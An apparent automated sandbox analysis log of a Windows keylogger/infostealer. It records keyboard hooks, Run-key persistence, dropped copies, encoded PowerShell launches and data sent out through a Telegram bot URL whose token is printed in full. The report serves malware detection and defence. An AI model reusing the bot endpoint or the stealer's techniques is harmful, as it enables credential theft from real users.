              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
              Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
              Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
              Source: kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5fHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_06FC01F8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,0000000015_2_06FC01F8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: izwFjkhFJm.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 0_2_054334F80_2_054334F8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 0_2_054360D00_2_054360D0
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EA9B815_2_018EA9B8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EC97815_2_018EC978
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018E9DA015_2_018E9DA0
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EA0E815_2_018EA0E8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_06FC3B1815_2_06FC3B18
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_06FCA41415_2_06FCA414
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073E637315_2_073E6373
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073E926015_2_073E9260
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073ED4B815_2_073ED4B8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073E492815_2_073E4928
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.334575732.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000000.248218694.0000000000598000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000003.318656978.0000000005301000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWoxfcenh.dll" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.334575732.0000000003826000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000003.337045271.0000000006D3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.517910261.00000000012F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exeBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exeReversingLabs: Detection: 33%
              Source: izwFjkhFJm.exeVirustotal: Detection: 52%
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: izwFjkhFJm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Roaming\IenlugqJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/16@8/2
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: Oefdyik.exe, 0000001B.00000002.534154582.000000000302D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: izwFjkhFJm.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: izwFjkhFJm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: izwFjkhFJm.exeStatic file information: File size 1863168 > 1048576
              Source: izwFjkhFJm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: izwFjkhFJm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1c4800
              Source: izwFjkhFJm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 0_2_0266A338 push esp; iretd 0_2_0266A2BA
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to dropped file
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJump to dropped file

              Boot Survival

              barindex
              Creates multiple autostart registry keys
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OefdyikJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OefdyikJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OefdyikJump to behavior
